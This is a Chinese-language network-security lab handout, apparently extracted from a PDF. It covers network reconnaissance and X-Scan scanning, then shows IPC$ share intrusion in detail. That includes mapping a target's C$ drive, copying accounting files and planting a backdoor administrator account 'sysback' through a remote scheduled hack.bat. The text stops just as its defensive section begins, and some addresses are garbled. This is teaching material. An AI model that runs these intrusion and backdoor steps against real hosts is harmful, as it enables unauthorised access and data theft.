计算机网络安全实验二 .pdf

实验一信息收集及扫描工具的使用

【实验目的】

●掌握利用注册信息和基本命令实现信息搜集

●掌握结构探测的基本方法

●掌握X－SCAN的使用方法

【实验步骤】

一、获取以及的基本信息。

1、利用nslookup和ping获取IP地址

2、利用来获取信息

二、使用visualroute或者下载pingplotter来获取到达的结构信息。

三、获取局域网内主机00的资源信息。

1、ping–a00–t获取主机名

2、netstat–a00获取所在域以及其他信息

3、netview00获取共享资源

4、nbtstat–a00获取所在域以及其他信息

四、使用X-SCAN扫描局域网内主机00。

图1-1X-SCAN主界面

1、设置扫描地址范围。

图1-2X-SCAN扫描范围设置

2、在扫描模块中设置要扫描的项目。

图1-3X-SCAN扫描模块设置

3、设置并发扫描参数。

图1-4X-SCAN扫描参数设置

4、在扫描中跳过没有响应的主机。

图1-5X-SCAN其他参数设置

5、设置要检测的端口及检测方式。

图1-6X-SCAN检测方式设置

6、开设扫描，查看扫描报告。

【实验报告】

1、写出实验内容一中要求所获取的信息。

2、画出从本地主机到达的结构信息。

实验二IPC$入侵的防护

【实验目的】

●掌握IPC$连接的防护手段

●了解利用IPC$连接进行远程文件操作的方法。

●了解利用IPC$连接入侵主机的方法。

【实验步骤】

一、IPC$连接的建立与断开。

通过IPC$连接远程目标主机的条件是已获得目标主机管理员帐号和密码。

1、单击“开始”—“运行”，在“运行”对话框中输入“cmd”。

图2-1运行CMD

2、建立IPC$连接，键入命令netuse\\1\ipc$“qqqqqq”/user:“administrator”。

图2-2建立IPC$连接

3、映射网络驱动器，使用命令：netusez:\\1\c$。

4、映射成功后，打开“我的电脑”，会发现多了一个Z盘，该磁盘即为目标主机的C盘。

图2-3资源管理器

5、查找指定文件，用鼠标右键单击Z盘，选择“搜索”，查找关键字“账目”，结果如

图所示。将该文件夹复制、粘贴到本地磁盘，其操作就像对本地磁盘进行操作一样。

6、断开连接，键入”netuse*/del”命令断开所有的IPC$连接。

图2-4断开IPC连接

7、通过命令netuse\\目标IP\ipc$\del可以删除指定目标IP的IPC$连接。

二、建立后门账号

1、编写BAT文件。打开记事本，键入“netusersysback123456/add”和“netlocalgroup

administratorssysback/add”命令，编写完后，另存为“hack.bat”。如图所示。

图2-5hack.bat编辑

2、与目标主机建立IPC$连接。

3、复制文件到目标主机。打开MS—DOS，键入“copyhack.bat\\1\d$”命

令。COPY

命令执行成功后，就已经把E盘下的hack.bat文件拷贝到1的D盘内。

图2-6hack.bat复制

4、通过计划任务使远程主机执行hack.bat文件，键入”nettime\\1”命令，查

看目标系统时间。

图2-7hack.bat远处执行

5、如果目标系统的时间为23：22，则可键入“at\\123:30d:\hack.bat”命令，

计划任务添加完毕后，使用命令“netuse*/del”断开IPC$连接。

6、验证帐号是否成功建立。等一段时间后，估计远程主机已经执行了hack.bat文件。通过

建立IPC$连接来验证是否成功建立“sysback”帐号。若连接成功，说明管理员帐号“sysback”

已经成功建立连接。

三、安全解决方案

1、在PC（地址为1）删除默认共享，通过“netshare”了解共享资源。

图2-8共享资源

2、建立BAT文件，文件名为noshare.bat，内容如下：

“